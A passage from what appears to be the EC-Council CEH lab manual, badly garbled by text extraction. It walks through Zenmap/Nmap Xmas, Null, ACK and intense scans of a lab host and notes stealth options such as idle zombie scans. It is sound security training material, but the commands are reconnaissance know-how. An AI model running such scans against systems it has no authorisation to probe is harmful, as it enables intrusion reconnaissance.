FIGURE 6.12 The Zenmap main window with msrpc Service for Intense Scan18. Click the n e tb io s -s sn service to list all NetBIOS hostnames.
TTTZenmap
Scan Cancel
Scan Ic o ls E rofile Help
Target: 10.0.0.4
Command: nmap -T4 -A -v 10.0.0.4
Topology Host Deoils ScansPorts f HostsNmap Output
open
open
445 tcp
139 tcp
100.0 J 100.0.4
Hosts || Services |
Service
http
msrpc
FIGURE 6.13: The Zenmap main window with netbios-ssn Service for Intense Scan19. X m a s s c a n sends a T C P fram e to a remote device with URG, ACK, RST,
SYN, and FIN flags set. FIN scans only with OS TCP/IP developed
hid In Nmap, Option -r means don't randomi2e ports.
TASK 2X m a s S c a n
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 129
M odule 03 - S can n in g N e tw o rk s
according to RFC 793. The current version of Microsoft Windows is not supported.
20. Now, to perform a Xmas Scan, you need to create a new profile. Click P ro file N <־ e w P ro file o r C o m m an d Ctrl+ P
y Xmas scan (-sX) sets ׳the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
m The option —max- retries <numtries> specifies the maximum number of port scan proberetransmissions.
21. On the P ro file tab, enter X m a s S c a n in the P ro file n a m e text field.P ro file E d ito r
nmap -T4 -A -v 10.0.0.4
HelpDescription
The description is a fu ll description 0♦ v»hac the scan does, which may be long.
Caned 0 Save Cl a 1yci
Scan | Ping | Scripting | Target | Source[ Othct | Tim ingProfile
XmasScanj
P ro file In fo rm a tio n
Profile name
D *« n ip t10n
m The option -host- timeout <time> gives up on slow target hosts.
FIGURE 6.15: The Zenmap Profile Editor window with the Profile tab
C E H Lab M anual Page 130 Eth ica l Hacking and Countermeasures Copyright © by EC Counc11־A ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
22. Click the S c a n tab, and select X m a s T re e s c a n s־) X ) from the T C P
s c a n s : drop-down list.1_T□ ' xP ro file E d ito r
!m a p -T4 -A -v 10.0.0.4
HelpEnable all arf/anced/aggressive options
Enable OS detection (-0 ). version detection (-5V), script scanning (- sCM and traceroute (־־traceroute).
Scan | Ping | Scripting | Target) Source | Other Tim ingProfile
10.00.4
None FINone
ACK scan (-sA)
FIN scan (sF ׳ )
M aimon scan (-sM)
Null scan (-sN)
TCP SYN scan (-5S)
TCP connect >can (־»T)
(sW)־ W indow scan .
| Xmas Tree scan (־sX)
S u n optk>m
Target? (optional):
TCP scan:
Non-TCP scans:
T im ing template:
□ Version detection (-sV)
ח Idle Scan (Zombie) (-si)
□ FTP bounce attack ( (b־
□ Disable reverse DNS resc
ם IPv6 support (■6)
Cancel 0 Save Changes
FIGURE 6.16: The Zenmap Profile Editor window with the Scan tab23. Select N one in die N o n-TC P s c a n s : drop-down list and A g g re s s iv e ־)
T 4 ) in the T im in g te m p la te : list and click S a v e C h a n g e s
־י | ם ^1P ro file F r iito r
nmap •sX •T4 ■A ■v 10.0.0.4
HelpEnable all ad/anced/aggressive options
Enable OS detection (-0 ). version detection (-5V), script scanning (־ s Q and tracerou te(—traceroute).
Ping | Scripting [ Target Source | Other | Tim ingScarProfile
Scan option*
Target? (optional): 1D.0D.4
TCP scan: Xmas Tlee scan (-sX) | v |
Non-TCP scans:
T im ing template:
None [v׳ ]
Aggressive (-T4) [ v |
@ Enable all advanced/aggressve options (-A)
□ Operating system detection (-0)
O Version detection (-sV)
□ Idle Scan (Zombie) ( -51)
□ FTP bounce attack ( (b־
O Disable reverse DNS resolution (־n)
ח IPv6 support (-6)
Cancel 0 Save Changes
FIGURE 6.17: The Zenmap Profile Editor window with the Scan tab24. Enter the IP address in die T a rg e t : field, select the X m a s s c a n opdon
from the P ro file : field and click S c a n .
UDP scan is activated with the -sU option. It can be combined with a TCP scan type such as SYN scan to check both (sS־)protocols during the same run.
Q Nmap detects rate limiting and slows down accordingly to avoid flooding the network with useless packets that the target machine drops.
Q You can speed up your UDP scans by scanning more hosts in parallel, doing a quick scan of just the popular ports first, scanning from behind the firewall, and using ־־ host-timeout to skip slow hosts.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 131
Z e n m a p
M odule 03 - S can n in g N e tw o rk s
Scan Tools Profile Help
Target: 10.0.0.4 | v | Profile- | Xmas Scan | v | |Scan| Cancel |
Command: nmap -sX -T4 -A -v 1 0 0 .0 /
( Hosts || Services | Nm ap O utput P o rts /H o sts | Topology Host Details j Scans
0 5 < Host A V 1 | Details]
Filter Hosts
In Nmap, option -sY (SCTPINIT scan) is often referred to as half-open scanning, because you donft open a full SCTP association. You send an INIT chunk, as if you were going to open a real association and then wait for a response.
FIGURE 6.18: The Zenmap main window with Target and Profile entered25. Nmap scans the target IP address provided and displays results on the
N m ap O u tp ut tab.
izcZ e n m a p
10.0.0.4 v l Profile. Xmas Scan |Scani|
Scan Tools P rofile Help
Target
Command: nmap -sX -T4 -A -v 1 0 0 .0 /
N nap׳ O utput Ports / Hosts | Topology H ost Details | Scans
nmap -sX -T4 -A -v 10.0.0.4
S t a r t in g Nmap 6 .0 1 ( h t t p : / / n m a p . o r g ) a t 2 0 1 2 -0 8 -2 4
N<Fל loaded 93 s c r ip ts fo r scan n in g .NSE: S c r ip t P re -s c a n n in g .I n i t i a t i n g ARP P in g Scan a t 1 6 :2 9 S c a n n in g 1 0 .0 .0 .4 [1 p o r t ]C om p le ted ARP P in g Scan a t 1 6 :2 9 , 0 .1 5 s e la p s e d (1 t o t a l h o s ts )I n i t i a t i n g P a r a l l e l DMS r e s o lu t io n o f 1 h o s t , a t 1 6 :2 9 c o m p le te d P a r a l l e l dns r e s o lu t io n o f l n o s t . a t 1 6 :2 9 , 0 .0 0 s e la p s e dI n i t i a t i n g XMAS Scan a t 1 6 :2 9 S c a n r in g 1 0 .0 .6 .4 [1 0 9 0 p o r t s ]I n c r e a s in g send d e la y f o r 1 0 . 0 .0 . 4 f ro m 0 t o 5 due t o 34 o u t o f 84 d ro p p e d p ro & e s s in c e l a s t in c re a s e .C o m p le te d XMAS Scan a t 1 6 :3 0 , 8 .3 6 s e la p s e d :1 0 0 0 t o t a l p o r ts )Initiating Scrvice scon ot 16:30I n i t i a t i n g OS d e te c t io n ( t r y # 1 ) a g a i r s t 1 0 .0 .0 .4NSE: S c r ip t s c a n n in g 1 0 .0 .0 .4 .I n i t i a t i n g MSE a t 1 6 :3 0 C om p le ted NSE a t 1 6 :3 0 , 0 .0 0 s e la p s e d Nnap scon r e p o r t f o r 1 0 .0 .0 .4 H o s t i s up (0 .e 0 0 2 0 s la t e n c y ) .
ServicesHosts
OS « Host
* 10.0.0.4
£Q! When scanning systems, compliant with this RFC text, any packet not containing SYN, RST, or ACK bits results in a returned RST, if the port is closed, and no response at all, if the port is open.
a The option, -sA (TCP ACK scan) is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.
FIGURE 6.19: The Zenmap main window with the Nmap Output tab26. Click the S e r v ic e s tab located at the right side of die pane. It d is p la y s
all die services of that host.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 132
M odule 03 - S can n in g N e tw o rk s
Z־0=1 e n m a p
10.0.0.4 ^ Profile Xmas Scan י ' | | Scan |
Scan Io o ls P rofile Help
Target:
Command: nmap -sX -T4 -A -v 10.0.0.4
Nmap O utput Ports / Hosts | Topology | Host Details | Scans
Detailsnmap -sX T4 -A -v 10.0.0.4
Sח t a r t i n g Nmap 6 .0 1 ( h t t p : / / n m a p . o r g ) a t 2 0 1 2 *0 8 -2 4
: Loaded 03 * c r i p t c f o r s c a n n in g .NSE: S c r ip t P re -s c a n n in g .I n i t i a t i n g ARP P lr g Scan a t 1 6 :2 9S c a n r in g 1 0 . 0 .0 . 4 [1 p o r t ] mC om p le ted ARP P in g Scan a t 1 6 :2 9 , 8 .1 5 s e la p s e d (1 t o t a l h o s ts )I n i t i a t i n g 3a r a l l e l DNS r e s o lu t io n o f 1 h o s t , a t 1 6 :2 9 C om p le ted P a r a l l e l DNS r e s o lu t io n 0-f l n e s t , a t 1 6 :2 9 ,0 .0 0 s e la p s e dI n i t i a t i n g XMAS Scan a t 1 6 :2 9 S c a n r in g 1 0 .0 .0 .4 [1 0 0 0 p o r t s ]I n c r e a s in g send d e la y f o r 1 0 .0 .0 .4 f ro m e t o 5 due t o 34 o u t o f 84 d -o p p e d p ro o e s s in c e l a s t in c re a s e .C o m p le te d XMAS Scan a t 1 6 :3 0 . 8 .3 6 s e la p s e d (1 0 0 0 t o t a l p o r ts )I n i t i a t i n g S e rv ic e scan a t 1 6 :3 0I n i t i a t i n g OS d e te c t io n ( t r y # 1 ) a g a in s t 1 0 .0 .0 .4NSE: S c r ip t s c a n n in g 1 0 . 0 .0 . 4 .I n i t i a t i n g USE a t 1 6 :3 0C om p le ted NSE a t 1 6 :3 0 , 0 .0 0 s e la p s e dNnap scan report for 10.0.0.4H o s t i s up (0 .0 0 0 2 0 s la t e n c y ) . V
Hosts | Services |
FIGURE 6.20: Zenmap Main window with Services Tab27. Null s c a n works only if the operating system’s TCP/IP implementation
is developed according to RFC 793.111 a 111111 scan, attackers send a TCP frame to a remote host with NO Flags.
28. To perform a 111111 scan for a target IP address, create a new profile. Click P ro file N <־ e w P ro file o r C o m m an d C trl+ P
Zenmap
v Scan | Cancel |[ New Prof Je or Command C trkP | nas Scan9 £d it Selected Prof <e Qrl+E
| Hosts || Scrvncct Nmap Output Portj / Hosts | Topology] Ho»t D e ta S c e n t
OS « Host
w 10.0.0.4
FIGURE 6.21: The Zenmap main window with the New Profile or Command option
S T A S K 3
Null S ca n
The option Null Scan (-sN) does not set any bits (TCP flag header is 0).
m The option, -sZ (SCTP COOKIE ECHO scan) is an advance SCTP COOKIE ECHO scan. It takes advantage of the fact that SCTP implementations should silently drop packets containing COOKIE ECHO chunks on open ports but send an ABORT if the port is closed.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 133
M odule 03 - S can n in g N e tw o rk s
29. On die P ro file tab, input a profile name N ull S c a n in the P ro file n am e
text field.L ^ IP ro file E d itor
nmap -sX -T4 -A -v 10.0.0.4
HelpProfile name
This is how the profile v/ill be id e n tf ied in the drop-down com bo box in the scan tab.
Profile Scan | Ping | Scripting | Target | Source | Other | Timing^
P ro file In fo rm a tion
Profile name | Null Scanj~~|
Description
a The option, -si <zombiehost>[:<probeport>] (idle scan) is an advanced scan method that allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable IP fragmentation ID sequence generation on the zombie host to glean information about the open ports on the target.
FIGURE 622: The Zenmap Profile Editor with the Profile tab30. Click die S c a n tab in the P ro file E d ito r window. Now select the Null
S c a n sN־) ) option from the T C P s c a n : drop-down list.P ro file E d ito r
nmap -6X -T4 -A -v 10.0.0.4
HelpProf le name
This is how the profile w ill be identified n the drop-down com bo box n the scan tab.
Cancel Save Changes
Profile] Scan | p!ng | Scnptm gj larget | Source Jther Timing
Scan options
Targets (optional): 1C.0.0.4
TCP scan: Xmas Tree scan (-sX) | v
Non-TCP scans: None
Tim ing template: ACK seen ( sA)
[Vj Enable all advanced/aggressu FN scan (־sF)
□ Operating system detection (־ M aimon t « n (•?M)
□ Version detection (■sV) Null scan (•sN)
(71 Idle Scan (Zombie) (•si) TCP SYN scan(-sS)
O FTP bounce attack (-b) TCP connect scan (־sT)
(71 Disable reverse DNSresolutior Win cow scan (־ sW)
1 1 IPy 6 support (-6) Xmas Tree !can (-sX)
FIGURE 6.23: The Zenmap Profile Editor with the Scan tab31. Select N one from the N o n-TC P s c a n s : drop-down field and select
A g g re ss iv e (-T4) from the T im in g te m p la te : drop-down field.
32. Click S a v e C h a n g e s to save the newly created profile.
m The option, -b <FTP relay host> (FTP bounce scan) allows a user to connect to one FTP server, and then ask that files be sent to a third-party server. Such a feature is ripe for abuse on many levels, so most servers have ceased supporting it.
The option, -r (Don't randomize ports): By default, Nmap randomizes the scanned port order (except that certain commonly accessible ports are moved near the beginning for efficiency reasons). This randomization is normally desirable, but you can specify -r for sequential (sorted from lowest to highest) port scanning instead.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 134
M odule 03 - S can n in g N e tw o rk s
' - I T - 'P ro file E d ito r
|Scan[
HelpDisable reverse DNS resolution
N e\er do reverse DNS. This can slash scanning times.
£oncel E r j Save Change*
nmap -sN -sX -74 -A -v 10.0.0.4
Profile Scan P ing | Scripting | Target | S o iree [ C thci | Timing
Scan options
Targets (opbonal): 10.0.04
TCP scan: N u l scan (•sN) V
Non-TCP scans: None V
Tim ing template: Aggressive (-T4) V
C Operating system detection (-0 )
[ Z Version detection (-5V)
I Idle Scan (Zombie) (-si)
Q FTP bounce attack (-b)
I ! Disable reverse DNS resolution (-n)
□ IPv6 support (-6)
FIGURE 6.24: The Zenmap Profile Editor with the Scan tab33. 111 the main window of Zenmap, enter die ta rg e t IP a d d r e s s to scan,
select the Null S c a n profile from the P ro file drop-down list, and then click S c a n .
In Nmap, option — version-all (Try every single probe) is an alias for -- version-intensity 9, ensuring that every single probe is attempted against each port.
m The option,-־top- ports <n> scans the <n> highest-ratio ports found in the nmap-services file. <n> must be 1 or greater.
Zenmap
Null ScanP ro f 1י•:
Scfln Io o ls Erofile Help
Target | 10.0.0.4
Command: nmap -sN •sX •T4 -A *v 10.00.4
Topology | Host Detais ( ScansPorts / HostsNm ap O u tp jtServicesHosts
< Port < P rctoccl < State < Service < VersionOS < Host
*U 10.00.4
Filter Hosts
Q The option -sR (RPC scan), method works in conjunction with the various port scan methods of Nmap. It takes all the TCP/UDP ports found open and floods them with SunRPC program NULL commands in an attempt to determine whether they are RPC ports, and if so, what program and version number they serve up.
FIGURE 6.25: The Zenmap main window with Target and Profile entered34. Nmap scans the target IP address provided and displays results in N m ap
O u tp ut tab.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 135
M odule 03 - S can n in g N e tw o rk s
B Q uZenmapScan Tools Profile Help
Scan! Cancelv Profile: Null ScanTarget 10.0.0.4
Command: nmap -sN -T4 -A -v 10.C.0.4
DetailsפןNm ap O utput | P o rts / Hosts ] Topology [ H ost Details | ScansServicesHosts
nmap -sN •T4 • A -v 10.0.04
חOS < Host
IM 10.00.4S t a r t in g Mmap 6 .0 1 ( h t t p : / / n 1ra p .o r g ) a t 2012 0 8 24
N S t: Loaded 93 s c r i p t s f o r s c a n n in g .NSE: S c r ip t P re -s c a n n in g .I n i t i a t i n g ARP P in g Scan a t 1 6 :4 7 S c a n n in g 1 0 .6 .0 .4 [1 p o r t ]C o n p le te d ARP P in g Scan a t 1 6 :4 7 , 0 .1 4 s e la p s e c (1 t o t a lh o s ts )I n i t i a t i n g P a r a l l e l DNS r e s o lu t io n o f 1 h o s t . 2t 1 5 :4 7 C o n p le te d P a r a l l e l DNS r e s o lu t io n o-F 1 h o s t , a t 1 6 :4 7 , 0 .2 8 s e la p s e di n i t i a t i n g n u l l scan a t 1 6 :4 7 S c a n n in g 1 0 .0 .0 .4 [1 0 0 0 p o r t s ]I n c r e a s in g send d e la y f o r 1 0 .0 .0 .4 -from 0 t o 5 due t o 68 o u t o f 169 d ro p p e d p ro b e s s in c e l a s t in c re a s e .C o n p le te d NULL Scan a t 1 6 :4 7 , 7 .7 B s e la p s e d (1 0 0 0 t o t a l p o r t s )I n i t i a t i n g S e r v ic e scan a t 1 6 :4 7I n i t i a t i n g OS d e t e c t io n ( t r y * l ) a g a in s t 1 0 .0 .0 .4NSE: S c r ip t s c a n n in g 1 0 . 0 .0 . 4 .I n i t i a t i n g NSE a t 1 6 :4 7 C o n p le te d NSE a t 1 6 :4 7 , 0 .0 0 s e la D s e c Nmap scan r e p o r t f o r 1 0 .0 .0 .4 H o s t i s up ( 0 . 000068s la t e n c y ) .
Filter Hosts
FIGURE 6.26: The Zenmap main window with the Xmap Output tab35. Click the H o st D e ta ils tab to view the details of hosts, such as H o st
S ta tu s , A d d re s s e s . O pen P o rts , and C lo s e d P o rts
׳ - [ n r x 'Zenmap
CancelNull ScanProfile:
Scan Tools £ ro fle Help
Target 10.0.0.4
Command: nmap -sN -T4 •A -v 10.0.0.4
N m ap O utput | P o r ts / Hosts | Topology Host Details | ScansSen/icesHosts
- 10.0.0.4!
i eB Host Status
State: up
Open ports: 0
ports: 0
Closed ports: 1000
Scanned ports: 1000
Up tir re : Not available
Last boot: Not available
S AddressesIPv4: 10.0.0.4
IPv6: Not available
MAC: 00:15:5D:00:07:10
• C om m ents
OS « Host
* 10.0.0.4
Filter Hosts
FIGURE 627: The Zenmap main window with the Host Details tab36. Attackers send an A C K probe packet with a random sequence number.
No response means the port is filtered and an R S T response means die port is not filtered.
The option -version- trace (Trace version scan activity) causes Nmap to pnnt out extensive debugging info about what version scanning is doing. It is a subset of what you get with —packet-trace,
T A S K 4
A C K Flag S ca n
C E H Lab M anual Page 136 Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
37. To perform an A C K F la g S c a n for a target IP address, create a new profile. Click P ro file N <־ e w P ro file o r C o m m an d Ctrl+ P .
! ^□T
0 E
Zenmap
Ctrl+Efj?l Edit Selected Profile Command: !!m op ■v» ■ n* ־** •v
Porte / Ho«t« Topology | H o d Details J ScantN m ip O jtp u t
4 Po t׳ 4 Protocol 4 S ta tt 4 Service 4 Version
Services ]Host*OS 4 Host
IM 10.0.0.4
Filter Hosts
m The script: —script- updatedb option updates the script database found in scripts/script.db, which is used by Nmap to determine the available default scripts and categories. It is necessary to update the database only if you have added or removed NSE scripts from the default scripts directory or if you have changed the categories of any script. This option is generally used by itself: nmap ־־ script-updatedb.
FIGURE 6.28: The Zenmap main window with the New Profile or Command option38. On the P ro file tab, input A C K F lag S c a n in the P ro file n a m e text field.
r־ a nP ro file E d ito r
nmap -sN -T4 -A -v 10.0.0.4
HelpDescription
The descrption is a fu ll description o f what the scan does, which may be long.
£ancel 0 Save Changes
TimingProfile [scan | Ping | Scripting | Target | Soiree[ Cthei |
P ro file In fo rm a tion
Profile name |ACK PagScanj
Description
FIGURE 6.29: The Zenmap Profile Editor Window with the Profile tab39. To select the parameters for an ACK scan, click the S c a n tab in die
P ro file E d ito r window, select A C K s c a n sA־) ) from the N o n-TC P
s c a n s : drop-down list, and select N one for all die other fields but leave the T a rg e ts : field empty.
The options: ״min- parallelism <numprobes>; -max-parallelism <numprobes> (Adjust probe parallelization) control the total number of probes that may be outstanding for a host group. They are used for port scanning and host discovery. By default, Nmap calculates an ever- changing ideal parallelism based on network performance.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 137
M odule 03 - S can n in g N e tw o rk s
! x ׳ - ! □ Profile Editorי
[ScanJ
HelpEnable all advanced, aggressive optionsEnable OS detection (-0 ), version detection (-5V), script scanning (■ sC), and traceroute (־־ttaceroute).
£ancel Q Save Changes
nmap -sA -sW -T4 -A -v 10.0.0.4
Profile | Scan Ping Scnpting T 3rg=t Source Other Tim ing
Scan options
Targets (optional): 1 0 0 0 4
TCP scan: ACK scan (־sA) | v |
Non-TCP scans: None
Tim ing template: ACK scan( sA)
[34 Enable all advanced/aggressi\ FIN scan (-sF)
□ Operating system detection (- M aim on scan (-sM)
□ Version detection (-5V) Null scan (-sNl
O Idle Scan (Zombie) (־si) TCP SYN scan (-5S)
□ FTP bounce attack (־b) TCP connect scan (-sT)
f l Disable reverse DNS resolutior Vbincov\ scan (-sW)
1 1 IPv6 support (-6) Xmas Tree scan (-5X)
The option: —min-rtt- timeout <time>, --max-rtt- timeout <time>, —initial- rtt-timeout <t1me> (Adjust probe timeouts). Nmap maintains a running timeout value for determining how long it waits for a probe response before giving up or retransmitting the probe. This is calculated based on the response times of previous probes.
FIGURE 6.30: The Zenmap Profile Editor window with the Scan tab
4 0 . N o w c l ic k t h e Ping t a b a n d c h e c k IPProto probes (־PO) to p r o b e th e I P
a d d r e s s , a n d t h e n c l ic k Save Changes.
Profile Editor
[Scan]nmap -sA -sNJ -T4 -A -v -PO 100.0.4
HelpICMP tim«£tamp r#qu*:tSend an ICMP tim estam p probe to see i targets are up.
Profile Scan Ping Scnpting| Target | Source j Other Timing
Ping options
□ Don't p ing before scanning (־Pn)
I I ICMP ping (־PE)
Q ICMP tim estam p request (-PP)
I I ICMP netmask request [-PM)
□ ACK ping (-PA)
□ SYN ping (-PS)
Q UDP probes (-PU)
0 jlPProto prcb«s (-PO)i
( J SCTP INIT ping probes (-PY)
Cancel Save Changes
G The Option: -max- retries <numtries> (Specify the maximum number of port scan probe retransmissions). When Nmap receives no response to a port scan probe, it can mean the port is filtered.Or maybe the probe or response was simply lost on the network.
FIGURE 6.31: The Zenmap Profile Editor window with the Ping tab
4 1 . 111 th e Zenmap m a in w in d o w , i n p u t d i e I P a d d r e s s o f t h e t a r g e t
m a c h i n e ( in d i i s L a b : 10.0.0.3), s e le c t ACK Flag Scan f r o m Profile: d r o p - d o w n lis t , a n d t h e n c lic k Scan.
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 138
M odule 03 - S can n in g N e tw o rk s
£ 3 The option: -־host- timeout <time> (Give up on slow target hosts). Some hosts simply take a long time to scan. This may be due to poody performing or unreliable networking hardware or software, packet rate limiting, or a restrictive firewall. The slowest few percent of the scanned hosts can eat up a majority of the scan time.
4 2 . N m a p s c a n s d i e t a r g e t I P a d d r e s s p r o v i d e d a n d d is p la y s r e s u l t s o n
Nmap Output ta b .
The option: —scan- delay <time>; --max-scan- delay <time> (Adjust delay between probes) .This option causes Nmap to wait at least the given amount of time between each probe it sends to a given host. This is particularly useful in the case of rate limiting.
4 3 . T o v ie w m o r e d e ta i ls r e g a r d in g th e h o s t s , c l ic k d i e Host Details t a b
X Zenmaprן CancelACK Flag ScanProfile:
Sc$n Tools £ ro f le Help
Target: 10.0.0.4
Command: nmap -sA -P 0 1C.0.0.4
ScansHost Details
Details
Nm ap O utput j P o rts /H o s ts [ Topology
nmap -sA -PO 10D.0.4
S t a r t i n g ^map 6 .0 1 ( h t tp :/ / n m a p .o r g ) a t 2012-08-24 1 7 :0 3India Standard TineNmap s c a n r e p o r t f o r 1 0 .0 .0 .4Host is u9 (0.00000301 latency).A ll 1000 scanned ports on 10.0.0.4 are unfiltered WAC A d d re s s : 3 0 :1 5 :5 0 :0 0 :0 7 :1 0 ( M i c r o s o f t )
Nmap d o n e : 1 I P a d d re s s (1 h o s t u p ) s c a n n e c i n 7 .5 7 s e co n d s
Sen/icesHosts
OS < Host
* 10.0.0.4
Filter Hosts
FIGURE 6.33: The Zenmap main window with the Nmap Output tab
Zenmap־ם
CancelScanפבACK Flag Scanv Profile:
Scan Tools Profile Help
Target: 10.0.0.4
Command: nmap -sA -PO 10.0.0.4
Ports / Hosts I T o p o lo g y ] Host Details Scans JNmap O utput
D eta ils
Hosts Services
Filter Hosts
FIGURE 6.32: The Zenmap main window with the Target and Profile entered
Ethical Hacking and Countermeasures Copyright O by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited
CEH Lab Manual Page 139
M odule 03 - S can n in g N e tw o rk s
Zenmap
Scan Cancel[~v~| Profile: ACK Flag Scan
Scan Tools Profile Help
Target: 10.0.0.4
Com m and: nmap -sA -P O !0.0.04
ScansH ostD eta lsHosts || Services | Nm ap O utput J Ports / Hosts J Topology
־ ;10.0.04
IS5 Host Status
StateOpen portc:
Filtered ports:
Closed ports:
Seam ed ports: 1000
U p t im e N o t available
Last b o o t N o t available
B AddressesIPv4: 1a0.0.4
IPv6: Not available
MAC: 0Q15:50:00:07:10
♦ Comments
OS « Host
* 10.0.0.4
Filter Hosts
Q The option: —min- rate <number>; —max-rate < number> (Directly control the scanning rate). Nmap's dynamic timing does a good job of finding an appropriate speed at which to scan. Sometimes, however, you may happen to know an appropriate scanning rate for a network, or you may have to guarantee that a scan finishes by a certain time.
FIGURE 6.34: The Zenmap main window with the Host Details tab
L a b A n a ly s is
D o c u m e n t all d ie I P a d d re s s e s , o p e n a n d c lo s e d p o r t s , s e n d e e s , a n d p r o to c o ls y o u
d is c o v e re d d u r in g d ie lab .
T o o l / U t i l i t y I n f o r m a t i o n C o l l e c t e d / O b j e c t i v e s A c h i e v e d
T y p e s o f S c a n u s e d :
■ I n t e n s e s c a n
■ X m a s s c a n
י N u l l s c a n
■ A C K F la g s c a n
I n t e n s e S c a n — N m a p O u t p u t
■ A R P P in g S c a n - 1 h o s t
■ P a ra l le l D N S r e s o lu t i o n o f 1 h o s t
N m a p ■ S Y N S te a l th S c a n
• D i s c o v e r e d o p e n p o r t o n 1 0 .0 .0 .4
o 1 3 5 / t c p , 1 3 9 / tc p , 4 4 5 / tc p , . . .
■ M A C A d d r e s s
■ O p e r a t i n g S y s te m D e ta i l s
■ U p t im e G u e s s
■ N e t w o r k D is t a n c e
■ T C P S e q u e n c e P r e d i c t i o n
■ I P I D S e q u e n c e G e n e r a t i o n
■ S e rv ic e I n f o
CEH Lab Manual Page 140 Ethical Hacking and Countermeasures Copyright © by EC־CoundlAll Rights Reserved. Reproduction is Strictly Prohibited
M odule 03 - S can n in g N e tw o rk s
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TOTHIS LAB.
Q u e s t io n s
1. A n a ly z e a n d e v a lu a te th e r e s u lts b y s c a n n in g a ta rg e t n e tw o r k u s in g ;
a. S te a l th S c a n ( H a lf -o p e n S can )
b . n m a p - P
2 . P e r f o r m In v e r s e T C P F la g S c a n n in g a n d a n a ly z e h o s t s a n d se rv ic e s f o r a
ta r g e t m a c h in e i n d ie n e tw o rk .
I n t e r n e t C o n n e c t i o n R e q u i r e d
□ Y e s
P l a t f o r m S u p p o r t e d
0 C l a s s r o o m
0 N o
0 iL a b s
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 141
M odule 03 - S can n in g N e tw o rk s
Scanning a Network Using the NetScan Tools ProNetScanTools Pro is an integrated collection of internet information gathering and netirork troubleshooting utilitiesforNehrork P/vfessionals.L a b S c e n a r io
Y o u h a v e a lr e a d y n o t ic e d i n d ie p r e v io u s la b h o w y o u c a n g a d ie r in f o r m a t io n s u c h
as A R P p in g s c a n , M A C a d d re s s , o p e r a t in g s y s te m d e ta ils , I P I D s e q u e n c e
g e n e ra t io n , se rv ic e in f o , e tc . d i r o u g h Intense Scan. Xmas Scan. Null Scan a n d
ACK Flag Scan 111 N m a p . A 1 1 a t ta c k e r c a n s im p ly s c a n a ta r g e t w id io u t s e n d in g a s in g le p a c k e t to th e ta r g e t f r o m th e i r o w n I P a d d re s s ; in s te a d , d ie y u s e a zombie host to p e r f o r m th e s c a n re m o te ly a n d i f a n intrusion detection report is
g e n e ra te d , i t w ill d is p la y d ie I P o f d ie z o m b ie h o s t a s a n a tta c k e r . A tta c k e r s c a n
ea s ily k n o w h o w m a n y p a c k e ts h a v e b e e n s e n t s in c e d ie la s t p r o b e b y c h e c k in g d ie
I P p a c k e t fragment identification number ( IP ID ) .
A s a n e x p e r t p e n e t r a t i o n te s te r , y o u s h o u ld b e a b le to d e te r m in e w h e d ie r a T C P
p o r t is o p e n to s e n d a SYN ( s e s s io n e s ta b l is h m e n t) p a c k e t to th e p o r t . T h e ta r g e t
m a c h in e w ill r e s p o n d w id i a SYN ACK ( s e s s io n r e q u e s t a c k n o w le d g e m e n t) p a c k e t i f d ie p o r t is o p e n a n d RST (re se t) i f d ie p o r t is c lo s e d a n d b e p r e p a r e d to b lo c k a n y
s u c h a tta c k s 0 1 1 th e n e tw o r k
111 d iis la b y o u w ill le a r n to s c a n a n e tw o r k u s in g NetScan Tools Pro. Y o u a ls o n e e d
to d is c o v e r n e tw o rk , g a d ie r in f o r m a t io n a b o u t I n t e r n e t o r lo c a l L A N n e tw o r k
d e v ic e s , I P a d d re s s e s , d o m a in s , d e v ic e p o r t s , a n d m a n y o th e r n e tw o r k sp ec ific s .
L a b O b je c t iv e s
T h e o b je c t iv e o f d iis la b is a s s is t to t r o u b le s h o o t , d ia g n o s e , m o n i to r , a n d d is c o v e r d e v ic e s 0 1 1 n e tw o rk .
1 1 1 d i is la b , y o u n e e d to :
■ D is c o v e r s I P v 4 / I P v 6 a d d re s s e s , h o s tn a m e s , d o m a in n a m e s , e m a il a d d re s s e s , a n d U R L s
I C O N K E Y
2־ 3 Valuableinformation
Test yourknowledge
ס Web exercise
m Workbook review
D e te c t lo c a l p o r t s
Ethical Hacking and Countermeasures Copyright © by EC-CouncilAll Rights Reserved. Reproduction is Strictly Prohibited.
CEH Lab Manual Page 142
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
T o p e r f o r m d ie la b , y o u n e e d :
■ N e tS c a n T o o ls P r o lo c a te d a t D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\NetScanTools Pro
■ Y o u c a n a ls o d o w n lo a d th e l a t e s t v e r s io n o f NetScan Tools Pro f r o m
th e l in k h t t p : / / w w w . 1 1e t s c a n t o o l s . c o m / n s t p r o m a i 1 1 .h tm l
■ I f y o u d e c id e to d o w n lo a d d ie la te s t v e r s io n , d ie n s c r e e n s h o ts s h o w n in d ie
la b m ig h t d if fe r
■ A c o m p u t e r r u n n in g Windows Server 2012
